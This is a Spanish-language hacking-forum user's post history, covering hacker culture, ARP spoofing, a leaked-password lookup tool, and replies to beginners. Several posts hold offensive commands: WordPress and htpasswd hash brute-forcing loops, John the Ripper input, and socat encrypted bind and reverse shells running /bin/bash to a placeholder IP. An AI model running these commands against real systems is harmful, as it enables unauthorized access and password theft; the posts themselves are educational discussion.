Porque han visto Tron y han entendido la esencia de la programacion. Se creen dioses porque lo son.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#81
Debates, Reviews y Opiniones / Re:Porque hay programadores que se creen dioses ??
Julio 13, 2020, 03:18:50 AM #82
Debates, Reviews y Opiniones / Re:Que Diferencias hay entre un hacker de pelicula y otro de la vida real ?
Julio 12, 2020, 05:41:59 PM
Que los primeros no existen y los segundos si. Y no aporrean el teclado cuando hacen un ataque de fuerza bruta.
#83
Dudas y pedidos generales / Re:[SOLUCIONADO] Alguien tendrá este libro de criptografía con python
Julio 12, 2020, 06:26:30 AM #84
Debates, Reviews y Opiniones / Re:Para ser un hacker hay que ser un genio prodigio o todo se debe a la practica ?
Julio 11, 2020, 04:24:51 AM
Ser un hacker no es cuestion de ser un elegido de la naturaleza, es cuestion de transpiración. Vamos que hay que currarselo y sudar. Creo que el lema de todo hacker se basa en dos sencillas palabras:
TRY HARDER
TRY HARDER
#85
E-Zines / Re:UnderDOCS - Julio 2020, Número 12
Julio 10, 2020, 04:52:24 PM
Genial, de nuevo pena que sea el último número.
Besotes y gracias por el trabajo que os tomáis.
Besotes y gracias por el trabajo que os tomáis.
#86
Dudas y pedidos generales / Re:Spoffing
Julio 03, 2020, 06:47:09 PM
El arp spoofing tiene relacion con usurpar una mac. Se puede aplicar en todo el trayecto de los paquetes de la misma forma pero necesitas estar en cualquiera de las lans que conforman el camino de la comunicacion que deseas interceptar. Y normalmemte en esos tramos o eres de la isp o no tienes posibilidad de tener una maquina ahi para hacer el spoofing.
#87
Python / Re:Sencillo cliente FTP
Julio 02, 2020, 04:33:18 AM
Igual como siguiente paso, podrias programar el cliente ftp sin la libreria ftp. Utilizando sockets y viendo como es el estandar para hacer una implementacion tuya.
Igual no es cuestion de hacer todo el standard pero podrias implementar parte de las acciones que hace el cliente. Podrias incluir algo asi como una parte grafica. Las aplicaciones graficas siempre motivan un monton mas que las aplicaciones de linea de comando, al menos al principio.
Es solo una idea, la cuestion es seguir programando y aprendiendo.
Igual no es cuestion de hacer todo el standard pero podrias implementar parte de las acciones que hace el cliente. Podrias incluir algo asi como una parte grafica. Las aplicaciones graficas siempre motivan un monton mas que las aplicaciones de linea de comando, al menos al principio.
Es solo una idea, la cuestion es seguir programando y aprendiendo.
#88
Hacking / Re:Pwndb | La nueva herramienta para buscar contraseñas de emails friltados
Junio 30, 2020, 12:44:23 PM
Oh. Pense que erais los desarrolladores. Sobre los tor2web. Entiendo que la idea de la herramienta es etical hacking por lo que utilizar tor2web no seria un problema.
#89
Hacking / Re:Pwndb | La nueva herramienta para buscar contraseñas de emails friltados
Junio 29, 2020, 05:21:48 PM
Es un poco una reimplementación del karma, un parser para el servicio pwndb de tor. Lo que no entiendo es, que si hay que conectarse a tor para usar el programa, ¿Por que no vas directamente al servicio raiz en tor?. No se si te parece una reflexión coerente. Igual no.
¿Has pensado en utilizar cualquier servicio de tor2web para no obligar al usuario a disponer de tor? A fin de cuentas eso simplificaría enormemente el uso de la herramienta por parte del usuario.
Por otro lado, solo he oteado un poco el código del parser y no veo claro si estáis saltandoos o no el primer elemento que da la página de pwndb. Por siacaso lo comento, es una dirección de bitcoin que hay que saltarse porque no pertenece al leak en si. Hay que empezar a leer desde el segundo registro. Si lo habéis tenido en cuenta nada.
Enhorabuena por la herramienta y un saludo
¿Has pensado en utilizar cualquier servicio de tor2web para no obligar al usuario a disponer de tor? A fin de cuentas eso simplificaría enormemente el uso de la herramienta por parte del usuario.
Por otro lado, solo he oteado un poco el código del parser y no veo claro si estáis saltandoos o no el primer elemento que da la página de pwndb. Por siacaso lo comento, es una dirección de bitcoin que hay que saltarse porque no pertenece al leak en si. Hay que empezar a leer desde el segundo registro. Si lo habéis tenido en cuenta nada.
Enhorabuena por la herramienta y un saludo
#90
Dudas y pedidos generales / Re:Wireshark - Cabeceras GET codificadas
Junio 29, 2020, 04:17:25 AM
¿¿Y por que ves ACKs si detras hay un servidor web?? Deberías de ver la respuesta de pagina no encontrada o el index de esa web. ¿¿No será parte de un C&C que está escondido como tráfico web?? ¿Han podido introducir algo antes que deribe a que tengan ya el control de la máquina y eso séan órdenes?
#91
Dudas y pedidos generales / Re:Wireshark - Cabeceras GET codificadas
Junio 26, 2020, 12:22:54 PM
Asi de lejos parece base64
#92
Dudas y pedidos generales / Re:Error en conexion de una shell reverse con netcat
Junio 24, 2020, 05:55:50 AM
Cual va via wifi?? el servidor o el cliente? Tienes los firewalls bajados?? Te has dejado la dirección IP sin tachar y parece que deseabas que tu dirección IP permaneciiese en el anonimato.
#93
Dudas y pedidos generales / Re:geolocalizacion ip
Junio 18, 2020, 05:55:58 PM
Eso es delito de usurpación de identidad y alguno más. Si lo denunciais, probablemente bajo petición judicial, pidan la dirección IP a facebook y con la hora de conexión y la dirección IP la policía notificara el ISP y darán con la dirección física del usurpador.
Yo símplemente denunciaría.
Yo símplemente denunciaría.
#94
Dudas y pedidos generales / Re:[SOLUCIONADO] ayuda con desencriptación
Junio 18, 2020, 04:23:06 AM
Joder. Lo que mencionas en los ultimos links son ataques al servicio y no a la contraseña. Cuidadito con eso.
#95
Dudas y pedidos generales / Re:es posible localizar tu telefono con el imei
Junio 17, 2020, 10:03:52 AM
Hombre necesitarías el imei y algo más. El imei es sólo un identificador.
#96
Dudas y pedidos generales / Re:ayuda con desencriptación
Junio 17, 2020, 05:35:59 AM
Parece un hash de worpress. Los hashes no se desencriptan se prueban palabras hasta que das con ella.
Puedes implementar una fuerza bruta leyendo un fichero de passwords o mediante la generación de todas las palaras de distintas longitudes utilizando el hash en la funcion:
Código: text
Devuelve true o false segun si es correcto o no. Para hacerlo, tendrías que bajarte el wordpress e incluir la libreria en tu php para poder hacer el programa. Aqui la información de la API de wordpress para la función de chequeo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si optas por la opción fea. Hashcat creo que permitía resolver hashes de wordpress, Y john the ripper, no se en que versiones, también.
Para usar john the ripper tendrias que montar un fichero con filas, y en cada fila un nombre de usuario, seguido de ":" deguido del hash. De esta forma:
Código: text
y ese fichero usarlo como fichero de hashes para john the ripper.
Saludos.
Puedes implementar una fuerza bruta leyendo un fichero de passwords o mediante la generación de todas las palaras de distintas longitudes utilizando el hash en la funcion:
wp_check_password("palabra","HASH");
Devuelve true o false segun si es correcto o no. Para hacerlo, tendrías que bajarte el wordpress e incluir la libreria en tu php para poder hacer el programa. Aqui la información de la API de wordpress para la función de chequeo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si optas por la opción fea. Hashcat creo que permitía resolver hashes de wordpress, Y john the ripper, no se en que versiones, también.
Para usar john the ripper tendrias que montar un fichero con filas, y en cada fila un nombre de usuario, seguido de ":" deguido del hash. De esta forma:
user1:$P$B0cJNXmBtVvJPzeMM45137IYZ/aQ751
user2:$P$BIRMpD9uqjaTQp52AecpkaBf18adaO0
user3:$P$BnohJTEYcT7k./gAJooqBQTZXoSueN1
y ese fichero usarlo como fichero de hashes para john the ripper.
Saludos.
#97
E-Zines / Re:UnderDOCS - Junio 2020, Número 11
Junio 11, 2020, 04:47:58 AM
Gran trabajo, esperemos que no pare en el 12 y se siga, igual de forma semestral, timestral o bimensual.
Un abrazo y un besote.
Un abrazo y un besote.
#98
Dudas y pedidos generales / Re:[SOLUCIONADO] Hash
Junio 09, 2020, 08:40:06 AM
Igual no se me ha entendido. El hash en limpio es la palabra "bleh"
Si creas un archivo llamado "/tmp/lalala" con este contenido:
Código: text
Y despues con el comndo htpasswd ejecutas esto:
Código: text
Verás que el password en limpio es bleh.
Para scriptarlo y hacer un comprobador usando diccionario creo que es evidente, se puede hacer así:
Código: text
En el for puedes meter todas las palabras que desees comprobar, yo he metido en este caso pass1 bleh y pass2.
Si se desea hacer con un diccionario se podría hacer asi:
Código: text
En el archivo de diccionario deberían de estar las palabras a probar cada una en una linea. Y entre ellas encontrarse la palabra bleh.
Por último un fuerza bruta sencillo se puede hacer así, creo que esta preparado para eso al tener solo 4 caracteres. Se podría hacer con el siguiente comando:
Código: text
Si no se sabe el número de caracteres habria que probar primeo con 1, despues con 2 y así hasta obtenerlo.
Saludos.
Si creas un archivo llamado "/tmp/lalala" con este contenido:
hola:$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom
Y despues con el comndo htpasswd ejecutas esto:
htpasswd -bv /tmp/lalala hola bleh
Verás que el password en limpio es bleh.
Para scriptarlo y hacer un comprobador usando diccionario creo que es evidente, se puede hacer así:
for AUX in pass1 bleh pass2; do htpasswd -bv /tmp/lalala hola `echo $AUX` 2> /dev/null; if [ $? == 0 ]; then echo $AUX; fi; done;
En el for puedes meter todas las palabras que desees comprobar, yo he metido en este caso pass1 bleh y pass2.
Si se desea hacer con un diccionario se podría hacer asi:
cat diccionario | while read AUX; do htpasswd -bv /tmp/lalala hola `echo $AUX` 2> /dev/null; if [ $? == 0 ]; then echo $AUX; fi; done;
En el archivo de diccionario deberían de estar las palabras a probar cada una en una linea. Y entre ellas encontrarse la palabra bleh.
Por último un fuerza bruta sencillo se puede hacer así, creo que esta preparado para eso al tener solo 4 caracteres. Se podría hacer con el siguiente comando:
for AUX in {a..z}{a..z}{a..z}{a..z}; do htpasswd -bv /tmp/lalala hola `echo $AUX` 2> /dev/null; if [ $? == 0 ]; then echo $AUX; fi; done;
Si no se sabe el número de caracteres habria que probar primeo con 1, despues con 2 y así hasta obtenerlo.
Saludos.
#99
Hacking / Re:Shell Inversa "Cifrada"
Junio 03, 2020, 09:09:21 AM
Simplemente como contenido adicional, para casos en los que se desee hacerlo de forma muy simple sin tener que desarrollar nada. Las shells remotas cifradas se pueden hacer via socat. De hecho socat bajo mi punto de vista es muchísimo mas versatil que nc para muchas cosas.
Shell directa:
Código: text
Código: text
Shell inversa:
Código: text
Código: text
El certificado se puede hacer con openssl:
Código: text
Shell directa:
socat OPENSSL-LISTEN:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt EXEC:/bin/bash
socat stdio OPENSSL:IP:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt,verify=0
Shell inversa:
socat OPENSSL:IP:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt,verify=0 EXEC:/bin/bash
socat stdio OPENSSL-LISTEN:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt
El certificado se puede hacer con openssl:
openssl genrsa -out /tmp/mykey.key 1024
openssl req -new -key /tmp/mykey.key -x509 -days 3653 -out /tmp/mykey.crt
cat /tmp/mykey.key /tmp/mykey.crt > /tmp/key.pem
